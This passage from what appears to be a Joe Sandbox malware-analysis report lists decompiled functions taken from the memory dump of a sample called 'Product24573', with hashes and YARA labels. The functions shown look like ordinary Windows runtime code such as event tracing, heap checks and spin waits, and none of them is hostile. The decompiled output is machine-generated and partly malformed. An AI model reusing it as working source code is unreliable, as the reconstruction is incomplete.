                                          • Instruction ID: 3e67ff54b3b436601032bb72e80a49dd0dabbd896163b1b6c73eed2cc97271e1
                                          • Opcode Fuzzy Hash: 2a547b2435301c93ecc29cc9ff9710b1200ccb8b07d395e5c8cceb8694293164
                                          • Instruction Fuzzy Hash: 55018471E0421DABDB18DFA9D845FAEBBB8EF84714F404066F900EB391DB749901C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011AFEC0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E011AFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x11ed360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0113FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01117D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0113B640(E01139AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x011afec0
                                          0x011afec0
                                          0x011afecf
                                          0x011afed9
                                          0x011afede
                                          0x011afee0
                                          0x011afeeb
                                          0x011afef3
                                          0x011afef6
                                          0x011afef9
                                          0x011aff04
                                          0x011aff16
                                          0x011aff06
                                          0x011aff0f
                                          0x011aff0f
                                          0x011aff21
                                          0x011aff22
                                          0x011aff24
                                          0x011aff29
                                          0x011aff3e

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ed6abfe48b5b36da87d3a976d41dcf2ad7c697cce4489ce688761bff3595532
                                          • Instruction ID: 93d324cdcf667ac2147d4b25342bebcfc9631cff775b2af8aeaa89d6d7bf6317
                                          • Opcode Fuzzy Hash: 0ed6abfe48b5b36da87d3a976d41dcf2ad7c697cce4489ce688761bff3595532
                                          • Instruction Fuzzy Hash: 4F018871E0020DABDB18DBA9D845FAEBBB8EF85714F404066FA04AB390DB749901C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8A62 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E011C8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x11ed360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01117D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0113B640(E01139AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                          0x011c8a62
                                          0x011c8a71
                                          0x011c8a79
                                          0x011c8a82
                                          0x011c8a85
                                          0x011c8a89
                                          0x011c8a8c
                                          0x011c8a8f
                                          0x011c8a92
                                          0x011c8a95
                                          0x011c8a9f
                                          0x011c8ab1
                                          0x011c8aa1
                                          0x011c8aaa
                                          0x011c8aaa
                                          0x011c8abc
                                          0x011c8abd
                                          0x011c8abf
                                          0x011c8ac4
                                          0x011c8ada

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ef5fd4cacd06c52309a4b57913e2e58bed4fdb80c8d8739a4e42b2162d9c3d2
                                          • Instruction ID: 5b48b4c2cf348af92912f5dc6ed5739a217bb52a2279413bc121df77d9c4ed6f
                                          • Opcode Fuzzy Hash: 0ef5fd4cacd06c52309a4b57913e2e58bed4fdb80c8d8739a4e42b2162d9c3d2
                                          • Instruction Fuzzy Hash: 0A0121B1A0021D9FCB04DFA9D9419AEB7B8EF58714F10405AF904F7351D734A901CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8ED6 Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E011C8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x11ed360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01117D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0113B640(E01139AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                          0x011c8ed6
                                          0x011c8ee5
                                          0x011c8eed
                                          0x011c8ef0
                                          0x011c8efa
                                          0x011c8f03
                                          0x011c8f0c
                                          0x011c8f15
                                          0x011c8f24
                                          0x011c8f27
                                          0x011c8f31
                                          0x011c8f43
                                          0x011c8f33
                                          0x011c8f3c
                                          0x011c8f3c
                                          0x011c8f4e
                                          0x011c8f4f
                                          0x011c8f51
                                          0x011c8f56
                                          0x011c8f69

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 396dff0b47fcc236ceb0262905b7b3f6656f9bdf7577f3f3858cf33c48c0ff61
                                          • Instruction ID: d9e9a5feaf9319ce39f774e5aa1ed77e26a8e85aa51c47005426ca0bdbb61e7f
                                          • Opcode Fuzzy Hash: 396dff0b47fcc236ceb0262905b7b3f6656f9bdf7577f3f3858cf33c48c0ff61
                                          • Instruction Fuzzy Hash: 8811007090421A9FDB08DFA8D441AADB7F4BB58704F0442AAE518EB381E7349940CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FDB60 Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010FDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E010FDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E010FE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L010FE8B0(__ecx, _t14, 0xfff);
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                          0x010fdb64
                                          0x010fdb66
                                          0x010fdb6b
                                          0x010fdbaa
                                          0x010fdb71
                                          0x010fdb76
                                          0x010fdb7a
                                          0x010fdba3
                                          0x010fdb7c
                                          0x010fdb87
                                          0x010fdb8b
                                          0x01154fa1
                                          0x01154fb3
                                          0x01154fb8
                                          0x010fdb91
                                          0x010fdb96
                                          0x010fdb98
                                          0x010fdb98
                                          0x010fdb8b
                                          0x010fdb7a
                                          0x010fdb9d
                                          0x010fdba2

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction ID: 542fb0f54339d42b9de1e3d10ef7445e9fcdefc940b2d757203cd9a833186623
                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                          • Instruction Fuzzy Hash: F6F0FC33201627DBD3326ED98895F5BB6959FD1A60F16003DF7459BB44CA748C0297D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010FB1E1 Relevance: .0, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010FB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01117D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01117D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01177016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                          0x010fb1e8
                                          0x010fb1ea
                                          0x010fb1f3
                                          0x01154a17
                                          0x010fb1f9
                                          0x010fb1f9
                                          0x010fb1f9
                                          0x010fb201
                                          0x01154a21
                                          0x01154a2e
                                          0x00000000
                                          0x00000000
                                          0x01154a3b
                                          0x01154a4d
                                          0x01154a3d
                                          0x01154a46
                                          0x01154a46
                                          0x01154a55
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010fb20a
                                          0x010fb20a
                                          0x010fb20a
                                          0x010fb20a

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction ID: 2e8862372fcba3186f938848063e8c0ac3fe92226bf27782bf48a416043f859f
                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                          • Instruction Fuzzy Hash: 0B01F936200584DBD76A975DC804F6DBBD8EF51754F0900A5FE558BBB2E774C840C715
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0118FE87 Relevance: .0, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0118FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x11ed360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01117D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0113B640(E01139AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                          0x0118fe96
                                          0x0118fe9e
                                          0x0118fea1
                                          0x0118fead
                                          0x0118feb3
                                          0x0118feb9
                                          0x0118fec3
                                          0x0118fed5
                                          0x0118fec5
                                          0x0118fece
                                          0x0118fece
                                          0x0118fee0
                                          0x0118fee1
                                          0x0118fee3
                                          0x0118fee8
                                          0x0118fefb

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b719ac4ceb0bdecb750ce8c851e825e19b02accf40cb08fd982abcdc60fb30a
                                          • Instruction ID: bdd40b0103625a30746ab8e56a29e928fa22f89cfa5a26e900c9761248704d00
                                          • Opcode Fuzzy Hash: 9b719ac4ceb0bdecb750ce8c851e825e19b02accf40cb08fd982abcdc60fb30a
                                          • Instruction Fuzzy Hash: 37016270A0420DEFCB18EFACD541A6EB7F4EF04704F104169A514EB382D735D902CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B131B Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E011B131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x11ed360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01117D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0113B640(E01139AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x011b131b
                                          0x011b132a
                                          0x011b1330
                                          0x011b1336
                                          0x011b133e
                                          0x011b1341
                                          0x011b1344
                                          0x011b134f
                                          0x011b1361
                                          0x011b1351
                                          0x011b135a
                                          0x011b135a
                                          0x011b136c
                                          0x011b136d
                                          0x011b136f
                                          0x011b1374
                                          0x011b1387

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ce0d778e52992f4c10c5e8a7eb5c85527dbbfcbfa16623316ff956c92ae8536b
                                          • Instruction ID: 8edf7ee32b95241a972729ad3b9609e9c79e865e647315fafac8d102df5650ef
                                          • Opcode Fuzzy Hash: ce0d778e52992f4c10c5e8a7eb5c85527dbbfcbfa16623316ff956c92ae8536b
                                          • Instruction Fuzzy Hash: C30119B1A0520DAFCB08EFA9D545AAEB7F4EF58700F404069F915EB391E7749A40CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01126B90 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E01126B90(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t11;
				signed int _t12;
				intOrPtr _t19;
				void* _t20;
				intOrPtr* _t21;

				_t21 = _a4;
				_t19 =  *_t21;
				if(_t19 != 0) {
					if(_t19 < 0x1fff) {
						_t19 = _t19 + _t19;
					}
					L3:
					 *_t21 = _t19;
					asm("rdtsc");
					_v8 = 0;
					_t12 = _t11 & _t19 - 0x00000001;
					_t20 = _t19 + _t12;
					if(_t20 == 0) {
						L5:
						return _t12;
					} else {
						goto L4;
					}
					do {
						L4:
						asm("pause");
						_t12 = _v8 + 1;
						_v8 = _t12;
					} while (_t12 < _t20);
					goto L5;
				}
				_t12 =  *( *[fs:0x18] + 0x30);
				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
					goto L5;
				}
				_t19 = 0x40;
				goto L3;
			}









                                          0x01126b96
                                          0x01126b99
                                          0x01126b9d
                                          0x01126be9
                                          0x01126beb
                                          0x01126beb
                                          0x01126bb3
                                          0x01126bb3
                                          0x01126bb5
                                          0x01126bba
                                          0x01126bc1
                                          0x01126bc3
                                          0x01126bc5
                                          0x01126be0
                                          0x01126be0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01126bc7
                                          0x01126bc7
                                          0x01126bd0
                                          0x01126bd5
                                          0x01126bd6
                                          0x01126bd9
                                          0x00000000
                                          0x01126bc7
                                          0x01126ba5
                                          0x01126bac
                                          0x00000000
                                          0x00000000
                                          0x01126bae
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                          • Instruction ID: 32cc20ff9ad115c5e7745e30ac047476ac15aaf886c2d436830aaa2d41aa6dfb
                                          • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                          • Instruction Fuzzy Hash: EBF04975B00218DFDB2CCE48C690AACBBB1EB55310F2440A8E9069B780D7399E10DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C8F6A Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 48%
                                          			E011C8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x11ed360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01117D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0113B640(E01139AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                          0x011c8f6a
                                          0x011c8f79
                                          0x011c8f81
                                          0x011c8f84
                                          0x011c8f8b
                                          0x011c8f91
                                          0x011c8f94
                                          0x011c8f9e
                                          0x011c8fb0
                                          0x011c8fa0
                                          0x011c8fa9
                                          0x011c8fa9
                                          0x011c8fbb
                                          0x011c8fbc
                                          0x011c8fbe
                                          0x011c8fc3
                                          0x011c8fd6

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 69c64504c48ff42f59c0254bb7fa2df5f5f6da7e1167d06d573e5a1656882384
                                          • Instruction ID: bb8df827355fc97b0a72d81fee6ff8358e12a7fa41c78464685dcc2cd08b0be6
                                          • Opcode Fuzzy Hash: 69c64504c48ff42f59c0254bb7fa2df5f5f6da7e1167d06d573e5a1656882384
                                          • Instruction Fuzzy Hash: 5D01AF70A0020DAFCB08EFA8D545AAEB7F4EF58300F104069F904EB380EB34DA00CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B1608 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E011B1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x11ed360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01117D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0113B640(E01139AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                          0x011b1608
                                          0x011b1617
                                          0x011b161d
                                          0x011b1625
                                          0x011b1628
                                          0x011b162b
                                          0x011b1636
                                          0x011b1648
                                          0x011b1638
                                          0x011b1641
                                          0x011b1641
                                          0x011b1653
                                          0x011b1654
                                          0x011b1656
                                          0x011b165b
                                          0x011b166e

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8fe05a0ad438b74e79e31560d67d5d7c55447201a0d89c626fd02f6a079fa2ab
                                          • Instruction ID: 46d2bc2c2e299200b9f131e1f1d36e3a98fea303d5caddfe39817b6397f8aa4a
                                          • Opcode Fuzzy Hash: 8fe05a0ad438b74e79e31560d67d5d7c55447201a0d89c626fd02f6a079fa2ab
                                          • Instruction Fuzzy Hash: 94F049B1A04248EFDB18EFE8D445AAEBBF4AF58300F444069E915EB381EA749900CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111C577 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0111C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0111C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10d11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E011C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                          0x0111c577
                                          0x0111c57d
                                          0x0111c581
                                          0x0111c5b5
                                          0x0111c5b9
                                          0x0111c5ce
                                          0x0111c5ce
                                          0x0111c5ca
                                          0x00000000
                                          0x0111c5ca
                                          0x0111c5c4
                                          0x0111c5c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111c5ad
                                          0x00000000
                                          0x0111c5af

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79f1726e543d8784460cee3e5c93227ec42df2de8b6103d9d1f23ff7aee8f7f8
                                          • Instruction ID: 2755bc2b707e0f88c790cd1d4297aefca7fd275f80c5dabd79524bdccf17e3a0
                                          • Opcode Fuzzy Hash: 79f1726e543d8784460cee3e5c93227ec42df2de8b6103d9d1f23ff7aee8f7f8
                                          • Instruction Fuzzy Hash: 5AF024B2B912908FE7BEC32CC004B22FFD99B04638F454577D5058310AC7A0C880CAC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B2073 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E011B2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E011AFD22(__ecx);
				_t19 =  *0x11e849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x11e8748; // 0x0
					if(__eflags <= 0) {
						E011B1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x11e8724 & 0x00000004;
							if(( *0x11e8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x11e8724; // 0x0
					return E011A8DF1(__ebx, 0xc0000374, 0x11e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                          0x011b2076
                                          0x011b2078
                                          0x011b207d
                                          0x011b2083
                                          0x011b20a4
                                          0x011b20aa
                                          0x011b20ac
                                          0x011b20b7
                                          0x011b20ba
                                          0x011b20bc
                                          0x011b20c9
                                          0x011b20c9
                                          0x011b20d0
                                          0x011b20d2
                                          0x00000000
                                          0x011b20d2
                                          0x011b20be
                                          0x011b20c3
                                          0x011b20c5
                                          0x011b20c7
                                          0x00000000
                                          0x00000000
                                          0x011b20c7
                                          0x011b20bc
                                          0x011b20d4
                                          0x011b2085
                                          0x011b2085
                                          0x011b20a3
                                          0x011b20a3

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 368c400d9fc0f4c25f405c0da7a39f6e671bbe8a18dc488f330c0bdba4786e87
                                          • Instruction ID: 2bf8cb52664c5e8a0ea71aab54edb6388dc861942490dfc0843d138f0768ab21
                                          • Opcode Fuzzy Hash: 368c400d9fc0f4c25f405c0da7a39f6e671bbe8a18dc488f330c0bdba4786e87
                                          • Instruction Fuzzy Hash: 14F0557E8115868ADF3F6BAC32803E93FD2D756154F0E0095D8A02B209C73498C7CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113927A Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0113927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0113FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E011392C6(_t11, _t14);
				}
				return _t11;
			}





                                          0x01139295
                                          0x01139299
                                          0x0113929f
                                          0x011392aa
                                          0x011392ad
                                          0x011392ae
                                          0x011392af
                                          0x011392b0
                                          0x011392b4
                                          0x011392bb
                                          0x011392bb
                                          0x011392c5

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
